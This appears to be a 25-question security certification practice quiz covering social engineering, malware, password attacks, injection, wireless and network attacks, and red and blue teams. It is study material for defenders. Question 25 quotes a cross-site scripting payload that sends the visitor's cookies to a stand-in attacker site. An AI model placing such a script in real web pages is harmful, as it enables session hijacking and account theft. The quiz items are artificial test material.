Exam simulator: Attacks, Threats, and Vulnerabilities – Part A
Anastasia-Instructor August 30, 2022
Question 1 of 25
1. Question
Match the following social engineering techniques with their meaning.
Techniques:
- Phishing
- Smishing
- Vishing
- Spear phishing
Meanings:
- An attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message
- The user is tricked into downloading a Trojan horse, virus or other malware onto his cellular phone or other mobile devices
- Individuals are tricked into revealing critical financial or personal information to unauthorized entities through voice email or VoIP (voice over IP)
- An email or electronic communications scam targeted towards a specific individual, organization or business.
Question 2 of 25
2. Question
Which of the following types of social engineering techniques is the use of messaging systems to send an unsolicited message to large numbers of recipients for the purpose of commercial advertising, or for the purpose of non-commercial proselytizing?
Question 3 of 25
3. Question
Which of the following types of social engineering is a method in which the attacker seeks to compromise a specific group of end-users by infecting websites that members of that group are known to visit?
Question 4 of 25
4. Question
Answer the fill-in-the-blank by typing one of the following types of attacks:
Trojan
Ransomware
Worm
Spyware
The type of malicious code or software that looks legitimate but can take control of your computer is known as ____. It is designed to damage, disrupt, steal, or in general, inflict some other harmful action on your data or network.
Question 5 of 25
5. Question
Which of the following attacks isn’t intended to steal data but to remain in place for as long as possible, quietly mining in the background?
Question 6 of 25
6. Question
A method by which authorized and unauthorized users are able to get around normal security measures and gain high-level user access (root access) on a computer system, network, or software application is known as:
Question 7 of 25
7. Question
Match the following password attack techniques with their meaning.
Techniques:
- Brute force attack
- Rainbow table attack
- Dictionary attack
- Plaintext Attack
Meanings:
- An attacker submitting many passwords or passphrases with the hope of eventually guessing correctly
- A type of hacking wherein the perpetrator tries to crack the passwords stored in a database system
- A method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password
- An attack model for cryptanalysis where the attacker has access to both the plaintext (called a crib), and its encrypted version (ciphertext).
Question 8 of 25
8. Question
Which of the following attacks occurs when someone infiltrates a system through an outside partner or provider with access to the systems and data?
Question 9 of 25
9. Question
Adversarial machine learning is a machine learning technique that attempts to fool models by supplying deceptive input. (True/False)
Question 10 of 25
10. Question
Which of the following cryptographic attacks force victims to use older, more vulnerable versions of software in order to exploit known vulnerabilities against them?
Question 11 of 25
11. Question
Which of the following attacks is known as URL hijacking?
Question 12 of 25
12. Question
What type of attack is when an attacker takes over a regular user account on a network and attempts to gain administrative permissions?
Question 13 of 25
13. Question
Given the following injection attacks, which one allows an attacker to interfere with the queries that an application makes to its database?
Question 14 of 25
14. Question
Which of the following options are considered as request forgery attacks? (Choose all that apply)
Question 15 of 25
15. Question
A member of the company asks for a financial transfer by sending an encrypted message to the financial administrator. An attacker eavesdrops on this message, captures it, and is now in a position to resend it. Because it’s an authentic message that has simply been resent, the message is already correctly encrypted and looks legitimate to the financial administrator. The financial administrator is then likely to respond to this new request, and that response could include sending a large sum of money to the attacker’s bank account.
Which of the following types of attack is described above?
Question 16 of 25
16. Question
In which of the following API attacks does the attacker intercept communications between an API endpoint and a client in order to steal and/or alter the confidential data that is passed between them?
Question 17 of 25
17. Question
There are two main techniques for driver manipulation: Shimming and Refactoring. Shimming is the process of changing a computer program’s internal structure without modifying its external functional behavior or existing functionality. (True/False)
Question 18 of 25
18. Question
Answer the fill-in-the-blank by typing one of the following types of attacks:
Jamming
Disassociation
Bluesnarfing
Bluejacking
____ attacks are a subset of denial of service (DoS) attacks in which malicious nodes block legitimate communication by causing intentional interference in networks.
Question 19 of 25
19. Question
In which of the following wireless network attacks does the attacker set up a fraudulent Wi-Fi access point that appears to be legitimate but is used to eavesdrop on wireless communications?
Question 20 of 25
20. Question
The attacker connects to a switch port and starts sending a very large number of Ethernet frames, each with a different fake source MAC address. The switch’s MAC address table becomes full and it can no longer store more MAC addresses, which means it enters a fail-open mode and starts behaving like a network hub. Frames are flooded to all ports, similar to a broadcast type of communication. The attacker’s machine will receive all the frames between the victim and other machines. The attacker will be able to capture sensitive data from the network.
Given the above scenario, identify the Layer 2 type of attack.
Question 21 of 25
21. Question
A company hired an outside contractor to oversee the cyber defense competition and adjudicate the event. Which of the following cybersecurity testing exercise teams has MOST likely been hired?
Question 22 of 25
22. Question
You have been hired to investigate an activity from an attacker who compromised a host on the company’s network. The attacker used credentials from an employee to breach the system. After a while, he gained access to a Linux server and he started using `sudo` commands to perform malicious activities. What sort of attack did the attacker use?
Question 23 of 25
23. Question
Which of the following threat actor terms is the act of breaking into a computer system, for politically or socially motivated purposes?
Question 24 of 25
24. Question
Which of the following statements describes the difference between the Red team and the Blue team in a cybersecurity testing exercise?
Question 25 of 25
25. Question
You have been hired as a security analyst to conduct a source code analysis on different websites. After spending hours trying to find out whether the sites are compromised or not, you notice the following code snippet:
"http://www.client-website.com/search?<script>location.href='http://www.villainsite.com/hijacker.php?cookie='+document.cookie;</script>"
Which of the following attacks is the attacker trying to conduct on your client’s website?